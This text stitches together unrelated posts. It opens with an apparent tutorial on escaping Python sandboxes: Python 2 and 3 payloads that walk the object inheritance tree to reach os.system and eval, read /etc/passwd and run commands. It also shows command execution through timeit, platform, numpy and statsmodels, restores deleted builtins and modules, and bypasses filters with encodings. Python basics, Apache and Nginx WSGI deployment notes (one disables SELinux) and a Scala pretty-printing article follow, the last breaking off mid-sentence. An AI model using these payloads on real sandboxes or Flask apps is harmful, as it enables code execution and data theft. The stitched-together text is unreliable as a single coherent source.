[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('id')
The root object and the inheritance tree

A quick review of some special attributes and methods in Python:

__class__ returns the type of the object it is called on

__bases__ returns the base classes

__mro__ traces the inheritance chain in the current environment

__subclasses__() returns the subclasses

__globals__ returns, as a dict, all the variables in the namespace of the module where the function lives.

Let's break down the payload from the previous section to understand the role the root object and the inheritance tree play in sandbox bypasses.

In the payload [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('id'), the rough idea is this: [], {} and '' are built-in objects in Python, and through their attributes and methods you can reach the inheritance tree of the current Python environment and climb up to the root object class. With functions such as __subclasses__() you can then crawl back down to every object, which lets you execute arbitrary code in the current Python environment.

>>> ''.__class__                     # get the type of ''
<type 'str'>
>>> ''.__class__.__bases__           # the base classes of ''
(<type 'basestring'>,)
>>> ''.__class__.__bases__[0]
<type 'basestring'>
>>> ''.__class__.__mro__             # the inheritance chain of ''
(<type 'str'>, <type 'basestring'>, <type 'object'>)
>>> ''.__class__.__mro__[-1]         # object is the base class of every Python object; grab it
<type 'object'>
>>> ''.__class__.__mro__[-1].__subclasses__()   # walk back down from the base class to find sensitive classes
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>]
>>>

From there the exploit code can be constructed.

Exploit code for Python 2:

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()

Exploit code for Python 3:

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
Using other libraries

The previous section climbed the inheritance tree from the root object to find usable objects or functions and used that syntax to get around keyword checks. Since Python has a huge number of libraries, you can also lean on built-in or third-party libraries that themselves can run commands: if such a library can be imported, try importing it and executing commands through it.

timeit:

import timeit
timeit.timeit("__import__('os').system('dir')", number=1)

exec and eval:

eval('__import__("os").system("id")')

platform:

import platform
platform.popen('id').read()

numpy:

from numpy.distutils.exec_command import _exec_command as system2
system2('id')

statsmodels:

import statsmodels.tsa.x13
output = statsmodels.tsa.x13.run_spec('id').stdout.read()
raise Exception(output)

Reloading the builtins

In Python, the built-in functions are the ones you use directly without importing anything, such as eval, exec, and open.

You can run dir(__builtins__) to see the current built-in functions; eval, exec, open, print and so on are all among them.

>>> dir(__builtins__) ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BlockingIOError', 'BrokenPipeError', 'BufferError', 'BytesWarning', 'ChildProcessError', 'ConnectionAbortedError', 'ConnectionError', 'ConnectionRefusedError', 'ConnectionResetError', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FileExistsError', 'FileNotFoundError', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'InterruptedError', 'IsADirectoryError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'ModuleNotFoundError', 'NameError', 'None', 'NotADirectoryError', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError', 'ResourceWarning', 'RuntimeError', 'RuntimeWarning', 'StopAsyncIteration', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'TimeoutError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '__build_class__', '__debug__', '__doc__', '__import__', '__loader__', '__name__', '__package__', '__spec__', 'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'exec', 'exit', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'vars', 'zip'] >>>

When a function is deleted from the builtins, it can no longer be used in the current environment.

>>> del __builtins__.__dict__['eval']
>>> del __builtins__.__dict__['open']
>>> del __builtins__.__dict__['exec']
>>>
>>> exec("print('test')")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'exec' is not defined
>>>

This kind of "deletion" is best understood as dropping a reference in memory: the function is only removed from the current running environment, the file on disk is not actually deleted. How do you escape a sandbox like this?

__builtin__ is a module that is imported by default, and it can be re-imported from the filesystem with the reload function. After re-importing it, __builtin__ in the current runtime is reset, and exec, eval, open and the rest become usable again.

>>> eval("__import__('os').system('id').read()")
uid=501(dr0op) gid=20(staff) groups=20(staff)
>>> del __builtins__.__dict__['eval']
>>> eval("__import__('os').system('id').read()")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'eval' is not defined
>>> reload(__builtins__)
<module '__builtin__' (built-in)>
>>> eval("__import__('os').system('id').read()")
uid=501(dr0op) gid=20(staff) groups=20(staff)
>>>

At this point the deleted eval function has come back to life.

But reload itself is also a function in __builtin__; if it gets deleted too, the trick above no longer works. As long as the file has not genuinely been removed, though, there may still be a way around it: Python ships a module, imp, that can be used instead.

import imp
imp.reload(__builtin__)

Restoring deleted packages

But once the os package has been removed from sys.modules, it can no longer be imported. Still, as long as os.py has not actually been deleted, it can be brought back.

Packages installed via pip usually end up in one of the following paths:

/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
~/.local/lib/python2.7/site-packages

After removing os from sys.modules, you can see that the os package can no longer be imported.

>>> sys.modules['os'] = None
>>> import os
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ImportError: No module named os
>>>

How Python's import works

Information about every module Python has loaded is kept in the sys.modules structure. When a module is imported, the following steps happen:

For import A: check whether A is already in sys.modules; if it is, don't load it again; if it is not, create a module object for A and load A.

For from A import B: first create a module object for A, then parse A, find B inside it, and fill it into A's dict.

Here the file has not been deleted, and importing a module is, at its core, just loading a file: even though the entry was removed from sys.modules, the module can be loaded back in from the file.

>>> import sys
>>> sys.modules['os'] = '/usr/lib/python2.7/os.py'
>>> import os
>>>

The approach above relies on sys; if sys has also been removed from sys.modules, you can use execfile to execute the file directly.

>>> execfile('/usr/lib/python2.7/os.py')
>>> system('id')
uid=501(dr0op) gid=20(staff) groups=20(staff)

A real-world case

While hunting for vulnerabilities at a large vendor, I found an online Python execution environment and tried a sandbox bypass against it to obtain system privileges.


Summary

1. First determine whether the environment is Python 2 or Python 3; exploitation differs somewhat between them.

2. Walking down from the root object to find exploitable functions is a fairly common sandbox bypass; Flask SSTI, for instance, uses this approach:

Start from [].__class__.__bases__[0].__subclasses__() or ''.__class__.__mro__[2].__subclasses__() and look at the available classes. If file is among them, consider read/write primitives. If <class 'warnings.WarningMessage'> is among them, consider getting eval, map and friends from .__init__.func_globals.values()[13], or getting os from .__init__.func_globals[linecache]. There is also the technique of crafting a .so file; see https://delcoding.github.io/2018/05/ciscn-writeup/ for details.

3. When keywords are filtered, bypass the filter with encodings such as base64 or rot13.

4. In real-world (non-CTF) testing, look at other libraries first, such as timeit, platform, and numpy.


Python basics roundup: sets, file operations, character encoding conversion, functions


Python basics roundup: sets, file operations, character encoding conversion, functions

In the age of AI, it's time to learn Python!

Since you've decided to learn Python, you have to start from the basics, step by step~!

Let's go through the basics below.

Sets and their methods

A set is an unordered collection with no duplicate elements.

list = {1, 3, 6, 5, 7, 9, 11, 3, 7}          # define a set, way one
list1 = set([1, 3, 6, 5, 7, 9, 11, 3, 7])    # define a set, way two
list2 = set()                                # define an empty set
print(list1, list)       # printing shows the elements have been deduplicated automatically
print(3 in list)         # test whether an element is in the set, returns a bool
print(20 not in list1)   # test whether an element is not in the set, returns a bool
list1.add(99)            # add one element
list1.update([10, 20, 30, 2])   # add several elements
list1.remove(3)          # remove an element, raises an error if it does not exist
print(list1.discard(8))  # remove an element, does nothing if it does not exist
print(len(list1))        # number of elements in the set
print(list1.pop())       # pop an arbitrary element from the set
list.clear()             # empty the set

Set operations

list1 = set([1, 3, 6, 5, 7, 9, 11, 3, 7])
list2 = set([2, 4, 6, 8, 3, 5])
print(list1, list2)
# intersection
print(list1.intersection(list2))
print(list1 & list2)
# union
print(list1.union(list2))
print(list1 | list2)
# difference
print(list1.difference(list2))
print(list1 - list2)
# symmetric difference
print(list1.symmetric_difference(list2))
print(list1 ^ list2)
# subset / superset tests
list3 = set([9, 11])
print(list3.issubset(list1))
print(list1.issuperset(list3))
# returns True if the two sets have no elements in common
list4 = set([20, 30])
print(list1.isdisjoint(list4))
print(list1.isdisjoint(list2))

File operations

Reading and writing files is a common need in development; the corresponding code is below.

File open modes

(The table of open modes was an image in the original post.)

Reading, writing, appending, and reading a file line by line

# read: read the whole file at once
f = open('test', 'r', encoding='utf-8')   # file handle
data = f.read()
print(data)

# write: write to a file
f = open('test1', 'w', encoding='utf-8')
f.write('我爱北京天安门, 天安门上太阳升')

# append: append to the end of the file
f = open('test1', 'a', encoding='utf-8')
f.write('呀呼嘿')

# loop: read the file line by line
# the efficient way: treat the file as an iterator, print one line at a time, only one line is cached in memory
f = open('test', 'r', encoding='utf-8')
count = 0
for l in f:
    if count == 9:
        print('----------')
        count += 1
        continue
    print(l.strip())
    count += 1

# the inefficient way: read the whole file into memory first
f = open('Sonnet', 'r', encoding='utf-8')
for index, line in enumerate(f.readlines()):
    if index == 9:
        print('------------')
        continue
    print(line.strip())

File object methods

f = open('test', 'r', encoding='utf-8')  # file handle, open the file in read mode
print(f.tell())        # get the current cursor position
print(f.readline())
print(f.readline())
print(f.tell())
print(f.readline())
f.seek(10)             # move the cursor to the 10th character
print(f.readline())
print(f.encoding)      # get the file encoding
print(f.fileno())      # the underlying file descriptor number
print(f.isatty())      # is the file a tty terminal?
print(f.readable())    # is the file readable?
print(f.writable())    # is the file writable?
print(f.seekable())    # can the cursor be moved? (a tty is not seekable)
f.flush()              # in write mode not every write hits the disk immediately; call this to flush the buffer right away
f.close()              # close the file
print(f.closed)        # is the file closed?

Modifying a file

# Modifying a file in place is hard; write the changes into another file instead,
# and write them back to the original file later if needed
f = open('test', 'r', encoding='utf-8')
f_new = open('test.bak', 'w', encoding='utf-8')
for line in f:
    if '我曾千万次梦见' in line:
        line = line.replace('我曾千万次梦见', '我不想千万次梦见')
    f_new.writelines(line)
f.close()
f_new.close()

A progress bar example, useful for understanding how flush works; it produces a progress bar effect:

import sys
import time

f = open('Sonnet1', 'w', encoding='utf-8')  # write mode creates a new file, or overwrites an existing file of the same name
for i in range(10):
    sys.stdout.write('#')
    sys.stdout.flush()
    time.sleep(0.2)

Character encoding conversion

The most important thing about character encoding conversion is to remember that Unicode is the transfer hub between encodings: if Unicode is neither the source nor the target encoding, then any conversion between two encodings has to go through Unicode (see the sketch below).

Note that Python 2's default encoding is ASCII, while Python 3's default encoding is Unicode.

In Python 3, encode converts the text and also turns a str into bytes, and decode turns bytes back into a str while decoding.


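The original diagram is not preserved in this text dump; a small Python 3 sketch of the idea it illustrated, with made-up sample text, where Unicode (str) sits in the middle of every conversion:

gbk_bytes = '你好'.encode('gbk')     # pretend these bytes came from a GBK-encoded source
text = gbk_bytes.decode('gbk')       # GBK bytes   -> Unicode str (the "transfer hub")
utf8_bytes = text.encode('utf-8')    # Unicode str -> UTF-8 bytes

back = utf8_bytes.decode('utf-8')    # decode() turns bytes back into str
print(text == back)                  # True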

Functions

A function is an organized, reusable block of code that implements a single piece of functionality or a set of related ones.

Functions improve an application's modularity and the amount of code reuse. Python provides many built-in functions (such as print()); you can also create your own, i.e. user-defined functions.

To define a function that does what you want, follow these rules (a small example follows the list):

A function block starts with the def keyword, followed by the function name and parentheses ().
Any input parameters and arguments must be placed inside the parentheses, which is where parameters are defined.
The first statement of a function body can optionally be a docstring, used to describe the function.
The function body starts after a colon and is indented.
return [expression] ends the function, optionally returning a value to the caller; a return with no expression is equivalent to returning None.
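A minimal example illustrating these rules (the function itself is made up):

def add(a, b):
    """Return the sum of a and b."""   # optional docstring describing the function
    result = a + b
    return result                       # return a value to the caller; plain return would give None

print(add(1, 2))   # 3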

Still to be covered: function parameters, variable scope, recursion, and higher-order functions.

Deploying Python web applications


https://www.cnblogs.com/wspblog/p/8575101.html#_label0

Running a Python WSGI application with the Apache module mod_wsgi

Flask applications are built on the WSGI specification, so they can run in any web application server that supports the WSGI protocol; the most common setup is Apache + mod_wsgi.

Apache's main configuration file is /etc/httpd/conf/httpd.conf

Other configuration files are stored in the /etc/httpd/conf.d/ directory

Installing mod_wsgi

Install httpd-devel:

$ yum install httpd-devel
$ rpm -ql httpd-devel

Install mod_wsgi:

$ yum install mod_wsgi

After installation, mod_wsgi.so will be in Apache's modules directory.

Add the following line to httpd.conf:

LoadModule wsgi_module modules/mod_wsgi.so

Restart Apache to enable the configuration:

$ sudo service httpd restart

Testing mod_wsgi

Create a file test.wsgi under Apache's DocumentRoot:

def application(environ, start_response):
    status = '200 OK'
    output = 'Hello World!'
    response_headers = [('Content-type', 'text/plain'),
                        ('Content-Length', str(len(output)))]
    start_response(status, response_headers)
    return [output]

The application function here is the WSGI application object; the value it returns is the response the application sends back for a request.

Then open Apache's configuration file httpd.conf again and append a URL path mapping at the end:

WSGIScriptAlias /test /var/www/html/test.wsgi

Test it:

curl http://localhost/test
Using a Python virtual environment

virtualenv is a tool for creating isolated Python environments. It creates a folder containing all the necessary executables and the pip-installed libraries that your Python project needs.

Configure app.wsgi:

activate_this = '/var/www/html/py3env/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))

from flask import Flask
application = Flask(__name__)

import sys
sys.path.insert(0, '/var/www/flask_test')
from app import app as application

Our virtual environment lives under /var/www/html; you can find the activation script activate_this.py in its /bin subdirectory. Just execute it at the very start of the WSGI application.

Apache configuration file:

<VirtualHost *:80>
    ServerName example.com
    WSGIScriptAlias / /var/www/html/app.wsgi
    <Directory /var/www/html>
        Require all granted
    </Directory>
</VirtualHost>

References

https://blog.csdn.net/yuzw_zw/article/details/83154633

Running a Python WSGI application in Apache

Running a Python WSGI application with Nginx + uWSGI

uWSGI is a web application server with application serving, proxying, process management and application monitoring capabilities. Although uWSGI can be used directly as a web server, it is usually recommended to run it as an application server behind Nginx, which makes better use of Nginx's strengths on the web-facing side.

Install uWSGI:

$ pip install uwsgi

Create server.py:

from flask import Flask

app = Flask(__name__)

@app.route('/')
def hello_world():
    return 'Hello World!'

if __name__ == '__main__':
    app.run()

Create the uWSGI configuration file uwsgi.ini:

[uwsgi]
http = 0.0.0.0:8080              # port the project is served on
chdir = /var/www/html/           # project directory
wsgi-file = /var/www/html/server.py   # path to the project's startup file
callable = app                   # the application object; the WSGI standard name is "application"
master = true                    # master process (monitors the workers and restarts any that die)
touch-reload = /var/www/html/    # watched path: reload the server automatically when files under it change
daemonize = uwsgi.log            # log file
stats = 127.0.0.1:9090           # expose the stats service at this address
vacuum = True                    # clean up the environment automatically when the server exits
# processes & threads
processes = 6
threads = 2

Start, restart and stop it:

uwsgi --ini uwsgi.ini      # start
uwsgi --reload uwsgi.pid   # restart
uwsgi --stop uwsgi.pid     # stop
Configuring Nginx

Change uWSGI from listening on an HTTP port to listening on a socket:

socket=127.0.0.1:8080

Modify the Nginx configuration file nginx.conf:

server {
    listen 80;
    server_name localhost 192.168.1.5;
    #root /usr/share/nginx/html;

    # Load configuration files for the default server block.
    include /etc/nginx/default.d/*.conf;

    location / {
        include uwsgi_params;
        uwsgi_pass 127.0.0.1:8080;
    }
}

Nginx forwards every incoming request to 127.0.0.1:8080, i.e. to the uWSGI server.

There is one pitfall here: because of SELinux permission restrictions on CentOS 7, Nginx could not forward requests to uWSGI, so I simply turned SELinux off:

vi /etc/selinux/config
Change SELINUX=enforcing to SELINUX=disabled

Restart Nginx and test.


Using a Python virtual environment:

[uwsgi]
...
virtualenv=/home/Smi1e/virtualenv

Deploying multiple applications

References

Running Python applications with Nginx and uWSGI

Compact, Streaming Pretty-Printing of Hierarchical Data

$
0
0


Pretty-printing hierarchical data into a human-readable form is a common thing to do. While a computer doesn't care exactly how you format the same textual data, a human would want to view data that is nicely laid out and indented, yet compact enough to make full use of the width of the output window and avoid wasting horizontal screen space. This post presents an algorithm which achieves optimal usage of horizontal space, predictable layout, and good runtime characteristics: peak heap usage linear in the width of the output window, the ability to start and stop the pretty-printing to print any portion of it, with total runtime linear in the portion of the structure printed.

Many data formats are hierarchical: whether textual formats like JSON or YAML, binary formats like MessagePack or Protobuf, or even program source code in common languages like Java or python. However, the same textual data can be formatted a variety of ways: perhaps it was written without strong style conventions, or minified to send over the wire. Binary data, of course, needs to be converted to textual data for human readability. While some data formats have interactive GUIs to let you explore them, in most cases that job falls to the pretty-printer to convert the data structure into a plain-text string that is sufficiently nicely formatted that someone can skim over it and find what they want without undue difficulty.

Requirements

Compact Output

Let us consider two samples of hierarchical data, formatted to fit within a 50 character wide screen. A JSON blob:

{
    "person1": {
        "name": "Alice",
        "favoriteColors": ["red", "green", "blue"]
    },
    "person2": {
        "name": "Bob",
        "favoriteColors": [
            "cyan",
            "magenta",
            "yellow",
            "black"
        ]
    }
}

And a Python code snippet:

model = Sequential(
    Dense(512, activation=relu),
    Dense(10, activation=softmax)
)

These two examples (both simplified from real code) are both roughly formatted to fit nicely within a 50 character wide output. Note how both examples have a mix of horizontally and vertically laid out structures: e.g. ["red", "green", "blue"] is horizontally laid out because it can fit within our 50 character max width, while ["cyan", "magenta", "yellow", "black"] is vertically laid out because if laid out horizontally it would overshoot. This layout makes maximal use of the horizontal space available while also formatting things vertically where necessary, resulting in compact output that is easy to read.

While there is some variety in exactly how things should be formatted - e.g. some people prefer closing braces on the same line as the enclosing statement - this post will walk through the algorithm for the choice of pretty-printing given above. Adapting it to other styles is straightforward.

Configurable Width

The way you pretty-print a structure depends on how wide you want it to be: for example, above we assumed a target width of 50 characters. If it was narrower, we would likely want to spread things out more vertically to avoid overshooting our target width. Here is the JSON example formatted for a target width of 30 characters:

{
    "person1": {
        "name": "Alice",
        "favoriteColors": [
            "red",
            "green",
            "blue"
        ]
    },
    "person2": {
        "name": "Bob",
        "favoriteColors": [
            "cyan",
            "magenta",
            "yellow",
            "black"
        ]
    }
}

Here, we can see the ["red", "green", "blue"] array that was previously laid out horizontally now is laid out vertically to avoid hitting the line limit. And the Python code snippet:

model = Sequential(
    Dense(
        512,
        activation=relu
    ),
    Dense(
        10,
        activation=softmax
    )
)

Here, we see the Dense expressions are laid out vertically, to fit within the 30 character width limit.

Output widths can also be wider, rather than narrower. If we expand our output to 80 characters, we would expect to see more things laid out horizontally to take advantage of the added space to the right:

{
    "person1": {"name": "Alice", "favoriteColors": ["red", "green", "blue"]},
    "person2": {
        "name": "Bob",
        "favoriteColors": ["cyan", "magenta", "yellow", "black"]
    }
}

model = Sequential(Dense(512, activation=relu), Dense(10, activation=softmax))

Here, we see more items laid out horizontally: the entire "person1" in the JSON example fits on one line, as does the entire model in the Python example, while "person2" is still too long to fit within the 80 character limit without wrapping.

Efficiency

The last requirement that is often seen in pretty-printing is that of efficiency:

1. Constant heap usage: I would want to be able to pretty print large data structures without needing to load it all into memory at the same time for manipulation.

2. Linear execution time: pretty-printing should take time proportional to the thing you are trying to print, and shouldn't scale quadratically or exponentially when that thing gets bigger.

3. Laziness: I should be able to print only the part of the structure that I want, and then stop. For large structures, you often only need to see part of it (e.g. first 100 lines) to figure out what you need, and you shouldn't need to pay to pretty-print the entire structure.

Note that most common pretty-printers fail these requirements. Specifically, even something like a .toString function fails (1) because it has to materialize the whole thing in memory, and (3) because it has to construct the entire output string before you can see any output at all. This post will show you how to do better.

The Algorithm

I will present the algorithm written in Scala, but it should be easy to understand for anyone with familiarity with programming and trivially convertible to any language of your choice.

Interface

Now that we know what our requirements are, let us define the interface of our pretty-print function:

def prettyprint(t: T, maxWidth: Int, indent: Int): Iterator[String]

In detail:

t is the thing being pretty-printed, of type T . That would be either our JSON data structure, our Python syntax tree, or something else

maxWidth is the width the pretty-printer will try to avoid breaching.

indent is how far to indent nested parts of the pretty-printed output. In the above examples, this would be 4 spaces.

The Iterator[String] being returned represents the chunks of the pretty-printed output, that the caller of the function can stream on-demand and handle individually (writing them to a file, writing to stdout, ...) with the ability to stop early at any time and without ever materializing the whole output in memory. One common use case that we leave out here is a maxHeight: Int flag: while it is very common to want to see the first N lines of the pretty-printed output without evaluating the whole thing, this is trivially implementable on top of the Iterator[String] that prettyprint returns, and so implementing a maxHeight flag is left as an exercise to the reader.

To begin with, I will define a Tree data structure: this will be used to represent the thing we are trying to print in a hierarchical fashion:

sealed trait Tree

// Foo(aa, bbb, cccc)
case class Nested(prefix: String,
                  children: Iterator[Tree],
                  sep: String,
                  suffix: String) extends Tree

// xyz
case class Literal(body: String) extends Tree

This defines a type Tree with two subclasses: a Tree is either a Nested node representing something with a prefix/children/separator/suffix such as Foo(aa, bbb, cccc) or (123 456 789), or a Literal node representing a simple string. Note that the children of a Nested node is a one-shot Iterator[Tree], rather than a concrete Array[Tree]: we can define a Tree to mirror our data structure without actually materializing the whole thing in memory, as long as we only need to iterate over the tree once.

This is a relatively minimal representation, and is simplified for the sake of this blog post: it does not have handling for infix operators LHS op RHS, any sort of terminal nodes beyond a literal string, or anything else. Nevertheless, it is enough to handle many common formats, including the examples above. The Python example:

model = Sequential(
    Dense(512, activation=relu),
    Dense(10, activation=softmax)
)

Can be represented as:

def python = Nested(
  "model = Sequential(",
  Iterator(
    Nested(
      "Dense(",
      Iterator(Literal("512"), Literal("activation=relu")),
      ",",
      ")"
    ),
    Nested(
      "Dense(",
      Iterator(Literal("100"), Literal("activation=softmax")),
      ",",
      ")"
    ),
  ),
  ",",
  ")"
)

This is a bit of a mouthful, but it represents the entirety of the Tree that can be constructed from your Python syntax tree. Note that in real code, this would be constructed from an existing structure, rather than laid out literally as above.

Similarly the JSON snippet:

{
    "person1": {
        "name": "Alice",
        "favoriteColors": ["red", "green", "blue"]
    },
    "person2": {
        "name": "Bob",
        "favoriteColors": [
            "cyan",
            "magenta",
            "yellow",
            "black"
        ]
    }
}

Can be represented as:

def json = Nested(
  "{",
  Iterator(
    Nested(
      "\"person1\": {",
      Iterator(
        Literal("\"name\": \"Alive\""),
        Nested(
          "\"favoriteColors\": [",
          Iterator(
            Literal("\"red\""),
            Literal("\"green\""),
            Literal("\"blue\"")
          ),
          ",",
          "]"
        )
      ),
      ",",
      "}"
    ),
    Nested(
      "\"person2\": {",
      Iterator(
        Literal("\"name\": \"Bob\""),
        Nested(
          "\"favoriteColors\": [",
          Iterator(
            Literal("\"cyan\""),
            Literal("\"magenta\""),
            Literal("\"yellow\""),
            Literal("\"black\"")
          ),
          ",",
          "]"
        )
      ),
      ",",
      "}"
    )
  ),
  ",",
  "}"
)

Again, this would typically be constructed from your JSON data structure programmatically, and because Nested 's children is an Iterator we do not need to materialize the entire Tree in memory at the same time.

Now that we have an iterator-based Tree representation, let's change the signature of our pretty-printing function slightly to take Tree s instead of T s:

def prettyprint(t: Tree, maxWidth: Int, indent: Int): Iterator[String]

We leave out the code to go from JSON => Tree , or from Python Syntax Tree => Tree , since that would depend on the exact API of the data structure you are trying to pretty-print. For now, we will simply assume that such * => Tree functions exist.

The Implementation

The basic approach we will take with prettyprint is:

Recurse over the Tree , keeping track of the current left offset at every node

For each node, return a multiLine: Boolean of whether the current node's pretty-printing is multiple lines long, and an chunks: Iterator[String] of the chunks of pretty-printed output

For Literal nodes, this is trivial: if the body contains a newline, it is multiple lines long, and the chunks is an iterator whose sole contents is the body

For Nested nodes, this is more involved: to decide whether something is multiLine or not, we buffer up the pretty-printed chunks of its children and use those chunks to decide.

If we exhaust all the children, then return multiLine = false and an iterator over all the buffered chunks

If we fail to exhaust the children, either due to a child returning multiLine = true or due to hitting the maxWidth limit, return multiLine = true and a combined iterator of the buffered chunks and the iterator of remaining not-yet-buffered chunks

In code, this looks like:

import collection.mutable.Buffer

def prettyprint(t: Tree, maxWidth: Int, indent: Int): Iterator[String] = {
  def recurse(current: Tree, leftOffset: Int, enclosingSepWidth: Int): (Boolean, Iterator[String]) = {
    current match{
      case Literal(body) =>
        val multiLine = body.contains('\n')
        val chunks = Iterator(body)
        (multiLine, chunks)

      case Nested(prefix, children, sep, suffix) =>
        var usedWidth = leftOffset + prefix.length + suffix.length + enclosingSepWidth
        var multiLine = usedWidth > maxWidth

        val allChildChunks = Buffer[Iterator[String]]()
        // Prepare all child iterators, but do not actually consume them
        for(child <- children){
          val (childMultiLine, childChunks) = recurse(
            child,
            leftOffset + indent,
            if (children.hasNext) sep.trim.length else 0
          )
          if (childMultiLine) multiLine = true
          allChildChunks += childChunks
        }

        val bufferedChunks = Buffer[Buffer[String]]()
        val outChunkIterator = allChildChunks.iterator
        var remainingIterator: Iterator[String] = Iterator.empty
        // Buffer child node chunks, until they run out or we become multiline
        while(outChunkIterator.hasNext && !multiLine){
          bufferedChunks.append(Buffer())
          val childIterator = outChunkIterator.next()
          if (outChunkIterator.hasNext) usedWidth += sep.length
          while (childIterator.hasNext && !multiLine){
            val chunk = childIterator.next()
            bufferedChunks.last.append(chunk)
            usedWidth += chunk.length
            if (usedWidth > maxWidth) {
              remainingIterator = childIterator
              multiLine = true
            }
          }
        }

        def joinIterators(separated: Iterator[TraversableOnce[String]],
                          sepChunks: Seq[String]) = {
          separated.flatMap(sepChunks ++ _).drop(1)
        }

        val middleChunks =
          if (!multiLine) {
            // If not multiline, just join all child chunks by the separator
            joinIterators(bufferedChunks.iterator, Seq(sep))
          } else{
            // If multiline, piece back together the last half-consumed iterator
            // of the last child we half-buffered before we stopped buffering.
            val middleChildChunks = bufferedChunks.lastOption.map(_.iterator ++ remainingIterator)
            // Splice it in between the chunks of the fully-buffered children
            // and the not-at-all buffered children, joined with separators
            joinIterators(
              separated = bufferedChunks.dropRight(1).iterator ++ middleChildChunks ++ outChunkIterator,
              sepChunks = Seq(sep.trim, "\n", " " * (leftOffset + indent))
            ) ++ Iterator("\n", " " * leftOffset)
          }

        val chunks = Iterator(prefix) ++ middleChunks ++ Iterator(suffix)
        (multiLine, chunks)
    }
  }
  val (_, chunks) = recurse(t, 0, 0)
  chunks
}

There's a bit of messiness in keeping track of the usedWidth , joining child iterators by the separator, and mangling the half-buffered-half-not-buffered middleChildChunks , but otherwise it should be relatively clear what this code is doing.

We can run this on the example JSON and Python Tree s above:

var last = ""
for(i <- 0 until 200){
  val current = prettyprint(json, maxWidth = i, indent = 4).mkString
  if (current != last){
    println("width: " + i)
    println(current)
    last = current
  }
}

for(i <- 0 until 100){
  val current = prettyprint(python, maxWidth = i, indent = 4).mkString
  if (current != last){
    println("width: " + i)
    println(current)
    last = current
  }
}

Here's the output for pretty-printing the Python source code:

width: 0
model = Sequential(
    Dense(
        512,
        activation=relu
    ),
    Dense(
        100,
        activation=softmax
    )
)
width: 32
model = Sequential(
    Dense(512, activation=relu),
    Dense(
        100,
        activation=softmax
    )
)
width: 34
model = Sequential(
    Dense(512, activation=relu),
    Dense(100, activation=softmax)
)
width: 79
model = Sequential(Dense(512, activation=relu), Dense(100, activation=softmax))

Here, we can see every width at which the pretty-printing changes:

